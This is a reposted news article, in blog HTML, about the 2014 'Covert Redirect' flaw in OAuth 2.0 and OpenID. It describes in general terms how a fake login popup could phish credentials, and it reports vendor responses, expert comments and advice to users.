<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoV73rKk9LdEhVSrDxgTLIer56dnS5BeLAl0IYGkwG0ifMcNebValwiCBtrNQ2ZIS8uXABEIeYGrxeZlZTqMxSKRGBFTO2y9sNYXG4exuXPJP7rfIvglmenFaesrQgLr-Lsucx_JEOjwan/s1600/dangerous-fingers-hacking-540x334.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="246" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoV73rKk9LdEhVSrDxgTLIer56dnS5BeLAl0IYGkwG0ifMcNebValwiCBtrNQ2ZIS8uXABEIeYGrxeZlZTqMxSKRGBFTO2y9sNYXG4exuXPJP7rfIvglmenFaesrQgLr-Lsucx_JEOjwan/s400/dangerous-fingers-hacking-540x334.jpg" style="cursor: move;" width="400" /></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
A serious flaw in two widely used security standards could give anyone access to your account information at Google, Microsoft, Facebook, Twitter and many other online services. The flaw, dubbed "Covert Redirect" by its discoverer, exists in two open-source session-authorization protocols, OAuth 2.0 and OpenID.</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
Both standards are employed across the Internet to let users log into websites using their credentials from other sites, such as by logging into a Web forum using a Facebook or Twitter username and password instead of creating a new account just for that forum.</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
Attackers could exploit the flaw to disguise and launch phishing attempts from legitimate websites, said the flaw's finder, Mathematics Ph.D. student<span class="Apple-converted-space"> </span><a href="http://tetraph.com/wangjing" target="_blank">Wang Jing</a><span class="Apple-converted-space"> </span>of the Nanyang Technological University in Singapore.</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
Wang believes it's unlikely that this flaw will be patched any time soon. He says neither the authentication companies (those with which users have an account, such as Google, Microsoft, Facebook, Twitter or LinkedIn, among others) nor the client companies (sites or apps whose users log in via an account from an authentication company) are taking responsibility for fixing the issue.</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
"The vulnerability is usually due to the existing weakness in the third-party websites," Wang<span class="Apple-converted-space"> </span><a href="http://tetraph.com/covert_redirect/oauth2_openid_covert_redirect.html" target="_blank">writes on his own blog</a>. "However, they have little incentive to fix the problem."</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
The biggest danger of Covert Redirect is that it could be used to conduct<span class="Apple-converted-space"> </span><a href="http://tetraph.com/covert_redirect" target="_blank">phishing</a><span class="Apple-converted-space"> </span>attacks, in which cybercriminals seize login credentials, by using email messages containing links to malicious websites disguised as something their targets might want to visit.</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
Normal phishing attempts can be easy to spot, because the malicious page's URL will usually be off by a couple of letters from that of the real site. The difference with Covert Redirect is that an attacker could use the real website instead by corrupting the site with a malicious login popup dialogue box.</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
For example, say you regularly visit a given forum (the client company), to which you log in using your credentials from Facebook (the authentication company). Facebook uses OAuth 2.0 to authenticate logins, so an attacker could put a corrupted Facebook login popup box on this forum.</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
If you sign in using that popup box, your Facebook data will be released to the attacker, not to the forum. This means the attacker could possibly gain access to your Facebook account, which he or she<span class="Apple-converted-space"> </span> could use to<span class="Apple-converted-space"> </span><a href="http://www.tomsguide.com/us/scariest-security-threats,review-2144-2.html">s</a>pread more socially engineered attacks to your Facebook friends.</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
Covert Redirect could also be used in redirection attacks, which is when a link takes you to a different page than the one expected.</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
Wang told <a href="http://www.cnet.com/news/serious-security-flaw-in-oauth-and-openid-discovered/">CNET</a><span class="Apple-converted-space"> </span>authentication companies should create whitelists — pre-approved lists that block any not on it — of the client companies that are allowed to use OAuth and OpenID to redirect to them. But he said he had contacted a number of these authentication companies, who all shifted blame elsewhere.</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
Wang told CNET Facebook had told him it "understood the risks associated with OAuth 2.0" but that fixing the flaw would be "something that can't be accomplished in the short term." Google and LinkedIn allegedly told Wang they were looking into the issue, while Microsoft said the issue did not exist on its own sites.</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
Covert Redirect appears to exist in the implementations of the OpenID and OAuth standards used on client websites and apps. But because these two standards are open-source and were developed by a group of volunteers, there's no company or dedicated team that could devote itself to fixing the issue.</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b>Where does that leave things? </b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
"Given the trust users put in Facebook and other major OAuth providers, I think it will be easy for attackers to trick people into giving some access to their personal information stored on those service," Chris Wysopal, chief technology officer of Boston-area security firm Veracode and a member of the legendary 1990s hackerspace the L0pht, told CNET.</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
"It's not easy to fix, and any effective remedies would negatively impact the user experience," Jeremiah Grossman, founder of Santa Clara, Calif.-based WhiteHat Security, told CNET. "Just another example that Web security is fundamentally broken and the powers that be have little incentive to address the inherent flaws."</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
Users should be extra-wary of login popups on Web pages. If you wish to log into a given website, it might be better to use an account specific to that website instead of logging in with Facebook, Twitter, or another authentication company, which would require the use of OAuth and/or OpenID to do.</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
If you think someone has gained access to one of your online accounts, notify the service and change that account's password immediately.</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b>Related Articles:</b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://www.tomsguide.com/us/facebook-google-covert-redirect-flaw,news-18726.html">http://www.tomsguide.com/us/facebook-google-covert-redirect-flaw,news-18726.html</a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://www.scmagazine.com/covert-redirect-vulnerability-impacts-oauth-20-openid/article/345407/">http://www.scmagazine.com/covert-redirect-vulnerability-impacts-oauth-20-openid/article/345407/</a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://news.yahoo.com/facebook-google-users-threatened-security-192547549.html">http://news.yahoo.com/facebook-google-users-threatened-security-192547549.html</a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://thehackernews.com/2014/05/nasty-covert-redirect-vulnerability.html">http://thehackernews.com/2014/05/nasty-covert-redirect-vulnerability.html</a></div>
